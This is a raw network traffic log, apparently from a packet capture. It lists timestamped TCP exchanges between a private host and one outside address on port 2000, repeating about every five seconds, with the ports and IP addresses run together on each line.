          Dec 4, 2022 22:26:43.829144955 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:43.832950115 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:43.843960047 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:43.852924109 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:48.718485117 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:48.720021963 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:48.728378057 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:48.729249001 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:48.736062050 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:48.737054110 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:48.742849112 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:48.743616104 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:48.750327110 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:48.750926018 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:48.759143114 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:48.759768009 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:48.767210007 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:48.767901897 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:48.774135113 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:48.775851011 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:48.863099098 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:48.872844934 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:48.879905939 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:48.887803078 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:48.894529104 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:48.902863979 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:48.910120010 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:48.920305967 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:53.784198999 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:53.792690992 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:53.801238060 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:53.809648037 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:53.811919928 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:53.812453032 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:53.816921949 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:53.817508936 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:53.823147058 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:53.823765039 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:53.830387115 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:53.831151009 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:53.839263916 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:53.839764118 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:53.846049070 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:53.846538067 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:53.940026045 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:53.955718994 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:53.956651926 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:53.959681988 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:53.966448069 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:53.974749088 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:53.982918978 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:53.989775896 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:58.854425907 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:58.870264053 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:58.871601105 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:58.873956919 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:58.880955935 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:58.882524967 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:58.890043020 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:58.891432047 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:58.897102118 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:58.897711992 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:58.904594898 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:58.912636995 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:58.913147926 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:58.913290024 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:58.919565916 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:58.922261953 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:26:59.013721943 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:26:59.017821074 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:59.025984049 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:26:59.035799980 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:26:59.040855885 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:26:59.055880070 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:26:59.056983948 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:26:59.064960957 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:03.927269936 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:03.939834118 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:03.956475019 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:03.957268000 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:03.970632076 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:27:03.971725941 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:03.983509064 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:27:03.987437963 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:03.996546984 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:27:03.997277975 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:04.010351896 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:27:04.014182091 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:04.018553972 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:04.025907040 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:04.030067921 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:04.030603886 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:04.083767891 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:04.100532055 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:04.114598989 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:27:04.131946087 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:27:04.139813900 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:27:04.156440973 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:27:04.167654037 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:04.173873901 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:09.043742895 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:09.045376062 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:09.062906027 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:09.064165115 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:09.077651978 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:27:09.079106092 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:09.089178085 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:27:09.090568066 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:09.100533962 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:27:09.101675034 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:09.110481977 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:27:09.111318111 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:09.121674061 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:09.122375011 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:09.131025076 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:09.138763905 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:09.189301014 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:09.207473993 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:09.222532988 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:27:09.233619928 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:27:09.246681929 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:27:09.253863096 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:27:09.265786886 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:09.282553911 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:14.140465975 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:14.150793076 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:14.151905060 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:14.152137995 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:14.164197922 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:27:14.165441036 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:14.175295115 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:27:14.176512957 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:14.187679052 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:27:14.188963890 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:14.200750113 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:27:14.202434063 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:14.211338997 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:14.218727112 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:14.220052004 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:14.220637083 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:14.294450998 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:14.294617891 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:14.307491064 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:27:14.324420929 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:27:14.331430912 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:27:14.345416069 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:27:14.362649918 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:14.363169909 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:19.238070965 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:19.248615980 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:19.249119997 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:19.249660015 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:19.257760048 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:27:19.260226011 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:19.266540051 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:27:19.271765947 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:19.273175001 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:27:19.273624897 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:19.281367064 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:27:19.281958103 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:19.289529085 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:19.290649891 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:19.298583984 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:19.299691916 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:19.395108938 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:19.395690918 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:19.402354002 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:27:19.418467045 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:27:19.419164896 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:27:19.430578947 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:27:19.434257984 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:19.442122936 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:24.313739061 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:24.320661068 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:24.336627960 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:24.337310076 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:24.345719099 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:27:24.346360922 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:24.353976965 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:27:24.356646061 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:24.362978935 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:27:24.363562107 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:24.372842073 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:27:24.373461962 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:24.383579016 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:24.399096012 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:24.416466951 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:24.417001963 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:24.464483023 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:24.480159998 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:24.491084099 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:27:24.504194021 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:27:24.507174969 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:27:24.516323090 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:27:24.559360027 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:24.559412003 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:29.409233093 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:29.418154001 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:29.438379049 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:29.439805031 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:29.447151899 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:27:29.448262930 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:29.456454992 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:27:29.457968950 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:29.465066910 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:27:29.466471910 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:29.470772028 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:27:29.472168922 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:29.476388931 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:29.477188110 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:29.484114885 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:29.484849930 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:29.561153889 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:29.582056046 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:29.591022968 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:27:29.601118088 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:27:29.611038923 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:27:29.614943027 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:27:29.619019032 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:29.628514051 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:34.491985083 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:34.497231960 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:34.504757881 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:34.507637978 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:34.517509937 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:27:34.519531965 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:34.527636051 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:27:34.537753105 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:27:34.538336039 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:34.543493032 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:34.547334909 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:27:34.547875881 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:34.555947065 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:34.556427956 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:34.564753056 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:34.567747116 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:34.641246080 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:34.649880886 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:34.663834095 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:27:34.681948900 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:27:34.687170982 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:27:34.689771891 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:27:34.699889898 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:34.711191893 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:39.573437929 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:39.575534105 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:39.590770960 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:39.591911077 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:39.607229948 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:27:39.607944965 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:39.625312090 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:27:39.625792027 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:39.642465115 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:27:39.645911932 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:39.655656099 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:27:39.658580065 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:39.669692039 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:39.670502901 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:39.682833910 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:39.683423996 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:39.718408108 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:39.734205008 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:39.751049995 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:27:39.769829988 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:27:39.789292097 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:27:39.800960064 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:27:39.813157082 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:39.827348948 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:44.697549105 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:44.708116055 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:44.708983898 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:44.709760904 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:44.717977047 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:27:44.724198103 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:44.729748964 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:27:44.732222080 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:44.747406960 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:27:44.747865915 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:44.761080027 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:27:44.761696100 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:44.770402908 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:44.771028996 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:44.786365986 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:44.789668083 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:44.851443052 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:44.854053020 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:44.866579056 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:27:44.876039028 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:27:44.892642021 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:27:44.904643059 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:27:44.913032055 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:44.931622982 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:49.798233032 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:49.811184883 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:49.815432072 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:49.818720102 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:49.834590912 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:27:49.839476109 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:49.851041079 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:27:49.852319002 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:49.866285086 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:27:49.867588997 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:49.882950068 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:27:49.884165049 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:49.897100925 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:49.898678064 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:49.911118031 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:49.913331985 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:49.955461979 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:49.961553097 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:49.982810020 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:27:49.994692087 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:27:50.009836912 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:27:50.026583910 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:27:50.047360897 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:50.056747913 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:54.931590080 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:54.944437027 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:54.945462942 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:54.945566893 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:54.961090088 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:27:54.962330103 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:54.984040022 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:27:54.988104105 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:54.998357058 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:27:55.004053116 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:55.012219906 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:27:55.013861895 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:55.023710012 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:55.028034925 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:55.028115034 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:55.028732061 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:27:55.088078022 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:27:55.088239908 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:55.105458021 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:27:55.130590916 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:27:55.147598028 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:27:55.156498909 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:27:55.171960115 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:27:55.172028065 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:00.032679081 CET20004970886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:00.066483974 CET20004970986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:00.077486038 CET20004971186.48.24.91192.168.2.3
          Dec 4, 2022 22:28:00.083580017 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:00.097798109 CET20004972386.48.24.91192.168.2.3
          Dec 4, 2022 22:28:00.107585907 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:00.110018969 CET20004972586.48.24.91192.168.2.3
          Dec 4, 2022 22:28:00.119523048 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:00.123749018 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:28:00.143598080 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:00.150094986 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:00.152549982 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:00.158555984 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:00.164634943 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:00.200614929 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:00.283540010 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:01.127451897 CET497292000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:01.127871990 CET497272000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:01.129231930 CET497282000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:01.129981995 CET497232000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:01.130467892 CET497252000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:01.132711887 CET497112000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:01.133383989 CET497082000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:01.134202003 CET497092000192.168.2.386.48.24.91
          Dec 4, 2022 22:28:01.270400047 CET20004972986.48.24.91192.168.2.3
          Dec 4, 2022 22:28:01.271436930 CET20004972786.48.24.91192.168.2.3
          Dec 4, 2022 22:28:01.271466970 CET20004972886.48.24.91192.168.2.3
          Dec 4, 2022 22:28:01.273122072 CET20004972386.48.24.91192.168.2.3
